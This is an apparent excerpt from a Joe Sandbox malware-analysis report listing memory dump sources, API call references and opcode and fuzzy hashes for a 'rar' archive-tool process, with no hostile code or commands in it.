                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction ID: e120275f286f51f654ae991106ffdd6254088f84e3dcd94aeb1980dd2db7a054
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19E01A28E087854BFB447F209C813F963E26F94765F445438CC0E42396CE3DE82CA271
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4052775200-0
                                                                                                                                                                                                                              • Opcode ID: da8b584ffcaf93481d81d2d41b9bc2b44c14c1d75082b0bbdd69e90533a1b382
                                                                                                                                                                                                                              • Instruction ID: a3b89952de66526eb2aefc9b26b574e4b4ce3c0c13dea5bda792de317759fdcc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: da8b584ffcaf93481d81d2d41b9bc2b44c14c1d75082b0bbdd69e90533a1b382
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98E1B022A1A6C285EF60AF6494001FEE6E0FB517A4F844131DB9D47AE9DF7CE461E730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF7CF897EBE,00000000,00000000,00000000,00000000,00000007,00007FF7CF897C48), ref: 00007FF7CF8A1B8D
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF7CF897EBE,00000000,00000000,00000000,00000000,00000007,00007FF7CF897C48), ref: 00007FF7CF8A1BD7
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction ID: e848a400304ca6e06b85829d1c504152a94da0d143fcbb1395506dcb119acea0
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9314663A18AC146E730AF20E4053E9A6E0EB40B78F904334DE6C066C5EF7CC4A69B30
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction ID: c3920168b70b61791c8899e3a9160050e1f6aac4fe940fd6eec46237c187e774
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FC218253A08EC582EB019F29D5510B863B0FB98B98F58A321DF8D4365AEF38E5F58310
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 90a4837acc1fc12491c178c3c9be37aa4ece435cae8474025c89e62fe1400727
                                                                                                                                                                                                                              • Instruction ID: f88ed927e9e271ba67200bb1c8486f6704caeeac5a104f28370af1e3ba8ea9a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90a4837acc1fc12491c178c3c9be37aa4ece435cae8474025c89e62fe1400727
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B118431509BC281EA04BF54A9043E9E2E4EF44BA0FA40635DAAD077EADE7CD0619330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction ID: 721e42f3909092a8cfac37962b220a52497d50cef305027e3fab5241379af7b3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE01C231B1A6D143EAB46F26A4000A9A2E1EF54BB0F945230DE2D83BD4CE2CE461A730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF7CF897A7B
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8E2AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E7EF3
                                                                                                                                                                                                                              • setbuf.LIBCMT ref: 00007FF7CF897A8F
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF897B44: GetStdHandle.KERNEL32(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B4A
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF897B44: GetFileType.KERNELBASE(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B56
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF897B44: GetConsoleMode.KERNEL32(?,?,?,00007FF7CF897A9E), ref: 00007FF7CF897B69
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8E2ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E2AD0
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8E2B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E2C1C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4044681568-0
                                                                                                                                                                                                                              • Opcode ID: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
                                                                                                                                                                                                                              • Instruction ID: fed6d9be72ea50cb9bce99a080957e00245659e972c2766af022a856f75626a7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f07192c79666a39956ec6c96c62a0ae78d5d429c3948e52a2bea909d14abfe3a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5019008F191D206FE18BBB568A23F9A4C28F95330FC44278E52E4A2D7DD5C6965A371
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2976181284-0
                                                                                                                                                                                                                              • Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction ID: 40129369940295ee7c75465c038cc898c7927df94bf3d25972d8e83edfb4f778
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08016122A19AC296EB64AF29E4442F8A3A0EB44778F944331D63D411E5CF3CE596D770
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(00000800,00007FF7CF8A305D,?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800), ref: 00007FF7CF8A30F0
                                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7CF8B4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7CF8A3119
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                                                                              • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction ID: fd67e2e2bc92a940f51f25c61c09593dc6005de525dcf2d2a4543634cc26ed57
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F0A931B186C185EB60AF64F8453E9A2D0FF4D7E4F800131EA9C87795DE6CD5945720
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1175261203-0
                                                                                                                                                                                                                              • Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction ID: 287e08a179b73ad4945feb7b064b15dafd2fb708c0892d3fa55f73d76261076f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BCF01821B1C5C185FA70AF51E8153F5A2A4BF5CB94FC04031E9CD82659DE2CD1549B70
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                                                                                                              • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction ID: 6f2063950212c2260a7a76dbdb184916e110bec8f0b4109cecc7e221ffd1152d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8E0ED30B359914ADBE8AF198892FE9A3D0AB54B80FC02039E44A83A54ED2CC4549B20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
